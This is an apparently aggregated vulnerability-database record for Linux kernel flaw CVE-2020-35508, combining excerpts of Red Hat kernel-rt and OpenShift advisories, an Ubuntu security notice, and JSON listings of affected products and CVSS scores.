1879981 - CVE-2020-25643 kernel: improper input validation in ppp_cp_parse_cr function leads to memory corruption and read overflow
1882591 - CVE-2020-25285 kernel: race condition between hugetlb sysctl handlers in mm/hugetlb.c
1882594 - CVE-2020-25284 kernel: incomplete permission checking for access to rbd devices
1886109 - BUG: using smp_processor_id() in preemptible [00000000] code: handler106/3082 [rhel-rt-8.4.0]
1894793 - After configure hugepage and reboot test server, kernel got panic status.
1895961 - CVE-2020-25704 kernel: perf_event_parse_addr_filter memory
1896842 - host locks up when running stress-ng itimers on RT kernel.
1897869 - Running oslat in RT guest, guest kernel shows Call Trace: INFO: task kcompactd0:35 blocked for more than 600 seconds.
1900933 - CVE-2020-27786 kernel: use-after-free in kernel midi subsystem
1901161 - CVE-2020-15437 kernel: NULL pointer dereference in serial8250_isa_init_ports function in drivers/tty/serial/8250/8250_core.c
1901709 - CVE-2020-27835 kernel: child process is able to access parent mm through hfi dev file handle
1902724 - CVE-2020-35508 kernel: fork: fix copy_process(CLONE_PARENT) race with the exiting ->real_parent
1903126 - CVE-2020-28974 kernel: slab-out-of-bounds read in fbcon
1915799 - CVE-2021-0342 kernel: use after free in tun_get_user of tun.c could lead to local escalation of privilege
1919889 - CVE-2020-0431 kernel: possible out of bounds write in kbd_keycode of keyboard.c
1930246 - CVE-2020-12362 kernel: Integer overflow in Intel(R) Graphics Drivers
- Package List:
Red Hat Enterprise Linux Real Time for NFV (v. 8):
Source: kernel-rt-4.18.0-305.rt7.72.el8.src.rpm
x86_64: kernel-rt-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-core-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-core-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-devel-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-kvm-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-modules-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debuginfo-common-x86_64-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-devel-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-kvm-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-modules-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm
Red Hat Enterprise Linux Real Time (v. 8):
Source: kernel-rt-4.18.0-305.rt7.72.el8.src.rpm
x86_64: kernel-rt-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-core-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-core-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-devel-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-modules-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debug-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-debuginfo-common-x86_64-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-devel-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-modules-4.18.0-305.rt7.72.el8.x86_64.rpm kernel-rt-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc.
-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . 8) - aarch64, noarch, ppc64le, s390x, x86_64
Bug Fix(es):
- kernel-rt: update RT source tree to the latest RHEL-8.2.z10 Batch source tree (BZ#1968022)

Bug Fix(es):

- RHEL8.2 Snapshot2 - tpm: ibmvtpm: Wait for buffer to be set before proceeding (BZ#1933986)
- fnic crash from invalid request pointer (BZ#1961707)
- [Azure][RHEL8.4] Two Patches Needed To Enable Azure Host Time-syncing in VMs (BZ#1963051)
- RHEL kernel 8.2 and higher are affected by data corruption bug in raid1 arrays using bitmaps. (BZ#1969338)
- Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.
This advisory contains the container images for Red Hat OpenShift Container Platform 4.7.13. See the following advisory for the RPM packages for this release:
https://access.redhat.com/errata/RHSA-2021:2122
Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:
https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html
This update fixes the following bug among others:
- Previously, resources for the ClusterOperator were being created early in the update process, which led to update failures when the ClusterOperator had no status condition while Operators were updating. This bug fix changes the timing of when these resources are created. As a result, updates can take place without errors. (BZ#1959238)
Security Fix(es):
- gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)
You may download the oc tool and use it to inspect release image metadata as follows:
(For x86_64 architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.13-x86_64
The image digest is sha256:783a2c963f35ccab38e82e6a8c7fa954c3a4551e07d2f43c06098828dd986ed4
(For s390x architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.13-s390x
The image digest is sha256:4cf44e68413acad063203e1ee8982fd01d8b9c1f8643a5b31cd7ff341b3199cd
(For ppc64le architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.13-ppc64le
The image digest is sha256:d47ce972f87f14f1f3c5d50428d2255d1256dae3f45c938ace88547478643e36
All OpenShift Container Platform 4.7 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster-between-minor.html#understanding-upgrade-channels_updating-cluster-between-minor
- Solution:
For OpenShift Container Platform 4.7 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html
- Bugs fixed (https://bugzilla.redhat.com/):
1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation
1923268 - [Assisted-4.7] [Staging] Using two both spelling "canceled" "cancelled"
1947216 - [AWS] Missing iam:ListAttachedRolePolicies permission in permissions.go
1953963 - Enable/Disable host operations returns cluster resource with incomplete hosts list
1957749 - ovn-kubernetes pod should have CPU and memory requests set but not limits
1959238 - CVO creating cloud-controller-manager too early causing upgrade failures
1960103 - SR-IOV obliviously reboot the node
1961941 - Local Storage Operator using LocalVolume CR fails to create PV's when backend storage failure is simulated
1962302 - packageserver clusteroperator does not set reason or message for Available condition
1962312 - Deployment considered unhealthy despite being available and at latest generation
1962435 - Public DNS records were not deleted when destroying a cluster which is using byo private hosted zone
1963115 - Test verify /run filesystem contents failing
==========================================================================
Ubuntu Security Notice USN-4752-1
February 25, 2021
linux-oem-5.6 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 20.04 LTS
Summary:
Several security issues were fixed in the Linux kernel.
Software Description: - linux-oem-5.6: Linux kernel for OEM systems
Details:
Daniele Antonioli, Nils Ole Tippenhauer, and Kasper Rasmussen discovered that legacy pairing and secure-connections pairing authentication in the Bluetooth protocol could allow an unauthenticated user to complete authentication without pairing credentials via adjacent access. A physically proximate attacker could use this to impersonate a previously paired Bluetooth device. (CVE-2020-10135)
Jay Shin discovered that the ext4 file system implementation in the Linux kernel did not properly handle directory access with broken indexing, leading to an out-of-bounds read vulnerability. A local attacker could use this to cause a denial of service (system crash). (CVE-2020-14314)
It was discovered that the block layer implementation in the Linux kernel did not properly perform reference counting in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash). (CVE-2020-15436)
It was discovered that the serial port driver in the Linux kernel did not properly initialize a pointer in some situations. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2020-15437)
Andy Nguyen discovered that the Bluetooth HCI event packet parser in the Linux kernel did not properly handle event advertisements of certain sizes, leading to a heap-based buffer overflow. A physically proximate remote attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-24490)
It was discovered that the NFS client implementation in the Linux kernel did not properly perform bounds checking before copying security labels in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-25212)
It was discovered that the Rados block device (rbd) driver in the Linux kernel did not properly perform privilege checks for access to rbd devices in some situations. A local attacker could use this to map or unmap rbd block devices. (CVE-2020-25284)
It was discovered that the block layer subsystem in the Linux kernel did not properly handle zero-length requests. A local attacker could use this to cause a denial of service. (CVE-2020-25641)
It was discovered that the HDLC PPP implementation in the Linux kernel did not properly validate input in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-25643)
Kiyin (尹亮) discovered that the perf subsystem in the Linux kernel did not properly deallocate memory in some situations. A privileged attacker could use this to cause a denial of service (kernel memory exhaustion). (CVE-2020-25704)
It was discovered that the KVM hypervisor in the Linux kernel did not properly handle interrupts in certain situations. A local attacker in a guest VM could possibly use this to cause a denial of service (host system crash). (CVE-2020-27152)
It was discovered that the jfs file system implementation in the Linux kernel contained an out-of-bounds read vulnerability. A local attacker could use this to possibly cause a denial of service (system crash). (CVE-2020-27815)
It was discovered that an information leak existed in the syscall implementation in the Linux kernel on 32 bit systems. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2020-28588)
It was discovered that the framebuffer implementation in the Linux kernel did not properly perform range checks in certain situations. A local attacker could use this to expose sensitive information (kernel memory). A local attacker could use this to gain unintended write access to read-only memory pages. A local attacker could use this to cause a denial of service (system crash) or possibly expose sensitive information. (CVE-2020-29369)
Jann Horn discovered that the romfs file system in the Linux kernel did not properly validate file system meta-data, leading to an out-of-bounds read. An attacker could use this to construct a malicious romfs image that, when mounted, exposed sensitive information (kernel memory). (CVE-2020-29371)
Jann Horn discovered that the tty subsystem of the Linux kernel did not use consistent locking in some situations, leading to a read-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly expose sensitive information (kernel memory). (CVE-2020-29660)
Jann Horn discovered a race condition in the tty subsystem of the Linux kernel in the locking for the TIOCSPGRP ioctl(), leading to a use-after- free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-35508)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 20.04 LTS: linux-image-5.6.0-1048-oem 5.6.0-1048.52 linux-image-oem-20.04 5.6.0.1048.44
After a standard system update you need to reboot your computer to make all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.
References: https://usn.ubuntu.com/4752-1 CVE-2020-10135, CVE-2020-14314, CVE-2020-15436, CVE-2020-15437, CVE-2020-24490, CVE-2020-25212, CVE-2020-25284, CVE-2020-25641, CVE-2020-25643, CVE-2020-25704, CVE-2020-27152, CVE-2020-27815, CVE-2020-28588, CVE-2020-28915, CVE-2020-29368, CVE-2020-29369, CVE-2020-29371, CVE-2020-29660, CVE-2020-29661, CVE-2020-35508
Package Information: https://launchpad.net/ubuntu/+source/linux-oem-5.6/5.6.0-1048.52
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "brocade fabric operating system",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h610c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "a700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.12"
},
{
"_id": null,
"model": "h615c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fas8700",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "eq",
"trust": 1.0,
"vendor": "linux",
"version": "5.12"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.0"
},
{
"_id": null,
"model": "fas8300",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h610s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "aff a400",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": null,
"trust": 0.8,
"vendor": "linux",
"version": null
},
{
"_id": null,
"model": "red hat enterprise linux",
"scope": null,
"trust": 0.8,
"vendor": "Red Hat",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-016425"
},
{
"db": "NVD",
"id": "CVE-2020-35508"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "162654"
},
{
"db": "PACKETSTORM",
"id": "162626"
},
{
"db": "PACKETSTORM",
"id": "163584"
},
{
"db": "PACKETSTORM",
"id": "163589"
},
{
"db": "PACKETSTORM",
"id": "162877"
},
{
"db": "CNNVD",
"id": "CNNVD-202102-1668"
}
],
"trust": 1.1
},
"cve": "CVE-2020-35508",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.4,
"id": "CVE-2020-35508",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 4.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.4,
"id": "VHN-377704",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "LOW",
"baseScore": 4.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 1.0,
"id": "CVE-2020-35508",
"impactScore": 3.4,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "Low",
"baseScore": 4.5,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2020-35508",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-35508",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2020-35508",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202102-1668",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-377704",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-35508",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-377704"
},
{
"db": "VULMON",
"id": "CVE-2020-35508"
},
{
"db": "CNNVD",
"id": "CNNVD-202102-1668"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016425"
},
{
"db": "NVD",
"id": "CVE-2020-35508"
}
]
},
"description": {
"_id": null,
"data": "A flaw possibility of race condition and incorrect initialization of the process id was found in the Linux kernel child/parent process identification handling while filtering signal handlers. A local attacker is able to abuse this flaw to bypass checks to send any signal to a privileged process. Linux Kernel Contains an initialization vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Important: kernel-rt security and bug fix update\nAdvisory ID: RHSA-2021:1739-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:1739\nIssue date: 2021-05-18\nCVE Names: CVE-2019-19523 CVE-2019-19528 CVE-2020-0431\n CVE-2020-11608 CVE-2020-12114 CVE-2020-12362\n CVE-2020-12464 CVE-2020-14314 CVE-2020-14356\n CVE-2020-15437 CVE-2020-24394 CVE-2020-25212\n CVE-2020-25284 CVE-2020-25285 CVE-2020-25643\n CVE-2020-25704 CVE-2020-27786 CVE-2020-27835\n CVE-2020-28974 CVE-2020-35508 CVE-2021-0342\n====================================================================\n1. Summary:\n\nAn update for kernel-rt is now available for Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Real Time (v. 8) - x86_64\nRed Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. 
\n\nSecurity Fix(es):\n\n* kernel: Integer overflow in Intel(R) Graphics Drivers (CVE-2020-12362)\n\n* kernel: use-after-free caused by a malicious USB device in the\ndrivers/usb/misc/adutux.c driver (CVE-2019-19523)\n\n* kernel: use-after-free bug caused by a malicious USB device in the\ndrivers/usb/misc/iowarrior.c driver (CVE-2019-19528)\n\n* kernel: possible out of bounds write in kbd_keycode of keyboard.c\n(CVE-2020-0431)\n\n* kernel: DoS by corrupting mountpoint reference counter (CVE-2020-12114)\n\n* kernel: use-after-free in usb_sg_cancel function in\ndrivers/usb/core/message.c (CVE-2020-12464)\n\n* kernel: buffer uses out of index in ext3/4 filesystem (CVE-2020-14314)\n\n* kernel: Use After Free vulnerability in cgroup BPF component\n(CVE-2020-14356)\n\n* kernel: NULL pointer dereference in serial8250_isa_init_ports function in\ndrivers/tty/serial/8250/8250_core.c (CVE-2020-15437)\n\n* kernel: umask not applied on filesystem without ACL support\n(CVE-2020-24394)\n\n* kernel: TOCTOU mismatch in the NFS client code (CVE-2020-25212)\n\n* kernel: incomplete permission checking for access to rbd devices\n(CVE-2020-25284)\n\n* kernel: race condition between hugetlb sysctl handlers in mm/hugetlb.c\n(CVE-2020-25285)\n\n* kernel: improper input validation in ppp_cp_parse_cr function leads to\nmemory corruption and read overflow (CVE-2020-25643)\n\n* kernel: perf_event_parse_addr_filter memory (CVE-2020-25704)\n\n* kernel: use-after-free in kernel midi subsystem (CVE-2020-27786)\n\n* kernel: child process is able to access parent mm through hfi dev file\nhandle (CVE-2020-27835)\n\n* kernel: slab-out-of-bounds read in fbcon (CVE-2020-28974)\n\n* kernel: fork: fix copy_process(CLONE_PARENT) race with the exiting\n- -\u003ereal_parent (CVE-2020-35508)\n\n* kernel: use after free in tun_get_user of tun.c could lead to local\nescalation of privilege (CVE-2021-0342)\n\n* kernel: NULL pointer dereferences in ov511_mode_init_regs and\nov518_mode_init_regs in 
drivers/media/usb/gspca/ov519.c (CVE-2020-11608)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.4 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1783434 - CVE-2019-19523 kernel: use-after-free caused by a malicious USB device in the drivers/usb/misc/adutux.c driver\n1783507 - CVE-2019-19528 kernel: use-after-free bug caused by a malicious USB device in the drivers/usb/misc/iowarrior.c driver\n1831726 - CVE-2020-12464 kernel: use-after-free in usb_sg_cancel function in drivers/usb/core/message.c\n1833445 - CVE-2020-11608 kernel: NULL pointer dereferences in ov511_mode_init_regs and ov518_mode_init_regs in drivers/media/usb/gspca/ov519.c\n1848652 - CVE-2020-12114 kernel: DoS by corrupting mountpoint reference counter\n1853922 - CVE-2020-14314 kernel: buffer uses out of index in ext3/4 filesystem\n1868453 - CVE-2020-14356 kernel: Use After Free vulnerability in cgroup BPF component\n1869141 - CVE-2020-24394 kernel: umask not applied on filesystem without ACL support\n1877575 - CVE-2020-25212 kernel: TOCTOU mismatch in the NFS client code\n1879981 - CVE-2020-25643 kernel: improper input validation in ppp_cp_parse_cr function leads to memory corruption and read overflow\n1882591 - CVE-2020-25285 kernel: race condition between hugetlb sysctl handlers in mm/hugetlb.c\n1882594 - CVE-2020-25284 kernel: incomplete permission checking for access to rbd devices\n1886109 - BUG: using smp_processor_id() in preemptible [00000000] code: 
handler106/3082 [rhel-rt-8.4.0]\n1894793 - After configure hugepage and reboot test server, kernel got panic status. \n1895961 - CVE-2020-25704 kernel: perf_event_parse_addr_filter memory\n1896842 - host locks up when running stress-ng itimers on RT kernel. \n1897869 - Running oslat in RT guest, guest kernel shows Call Trace: INFO: task kcompactd0:35 blocked for more than 600 seconds. \n1900933 - CVE-2020-27786 kernel: use-after-free in kernel midi subsystem\n1901161 - CVE-2020-15437 kernel: NULL pointer dereference in serial8250_isa_init_ports function in drivers/tty/serial/8250/8250_core.c\n1901709 - CVE-2020-27835 kernel: child process is able to access parent mm through hfi dev file handle\n1902724 - CVE-2020-35508 kernel: fork: fix copy_process(CLONE_PARENT) race with the exiting -\u003ereal_parent\n1903126 - CVE-2020-28974 kernel: slab-out-of-bounds read in fbcon\n1915799 - CVE-2021-0342 kernel: use after free in tun_get_user of tun.c could lead to local escalation of privilege\n1919889 - CVE-2020-0431 kernel: possible out of bounds write in kbd_keycode of keyboard.c\n1930246 - CVE-2020-12362 kernel: Integer overflow in Intel(R) Graphics Drivers\n\n6. Package List:\n\nRed Hat Enterprise Linux Real Time for NFV (v. 
8):\n\nSource:\nkernel-rt-4.18.0-305.rt7.72.el8.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-core-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-core-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-kvm-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-devel-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-kvm-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-modules-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm\n\nRed Hat Enterprise Linux Real Time (v. 8):\n\nSource:\nkernel-rt-4.18.0-305.rt7.72.el8.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-core-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-core-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-devel-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-modules-4.18.0-305.rt7.72.el8.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. 
More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYKPwgNzjgjWX9erEAQiOVg//YfXIKUxc84y2aRexvrPHeTQvYkFMktq7\nNEhNhHqEZbDUabM5+eKb5hoyG44PmXvQuK1njYjEbpTjQss92U8fekGJZAR9Zbsl\nWEfVcu/ix/UJOzQj/lp+dKhirBSE/33xgBmSsQI6JQc+xn1AoZC8bOeSqyr7J6Y7\nt6I552Llhun9DDUGS8KYAM8PkrK3RGQybAS3S4atTdYd0qk42ZPF7/XqrbI7G4iq\n0Oe+ZePj6lN1O7pHV0WYUD2yzLTCZZopmz5847BLBEbGLqPyxlShZ+MFGsWxCOHk\ntW8lw/nqVt/MNlOXI1tD6P6iFZ6JQYrRU5mGFlvsl3t9NQW60MxmcUNPgtVknXW5\nBssBM/r6uLi0yFTTnDRZnv2MCs7fIzzqKXOHozrCvItswG6S8Qs72MaW2EQHAEen\nm7/fMKWTjt9CQudNCm/FwHLb8O9cYnOZwRiAINomo2B/Fi1b7WlquETSmjgQaQNr\nRxqtgiNQ98q92gnFgC8pCzxmiKRmHLFJEuxXYVq0O8Ch5i/eC8ExoO7Hqe6kYnJe\nZaST6fAtb2bMDcPdborfSIUmuDcYdKFtcEfCuuFZIbBxnL2aJDMw0zen/rmDNQyV\nlwwXoKanoP5EjKKFMc/zkeHlOInMzeHa/0DIlA9h3kpro5eGN0uOPZvsrlryjC+J\niJzkORGWplM\\xfb/D\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. \n\nBug Fix(es):\n\n* kernel-rt: update RT source tree to the latest RHEL-8.2.z10 Batch source\ntree (BZ#1968022)\n\n4. \n\nBug Fix(es):\n\n* RHEL8.2 Snapshot2 - tpm: ibmvtpm: Wait for buffer to be set before\nproceeding (BZ#1933986)\n\n* fnic crash from invalid request pointer (BZ#1961707)\n\n* [Azure][RHEL8.4] Two Patches Needed To Enable Azure Host Time-syncing in\nVMs (BZ#1963051)\n\n* RHEL kernel 8.2 and higher are affected by data corruption bug in raid1\narrays using bitmaps. (BZ#1969338)\n\n4. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.7.13. 
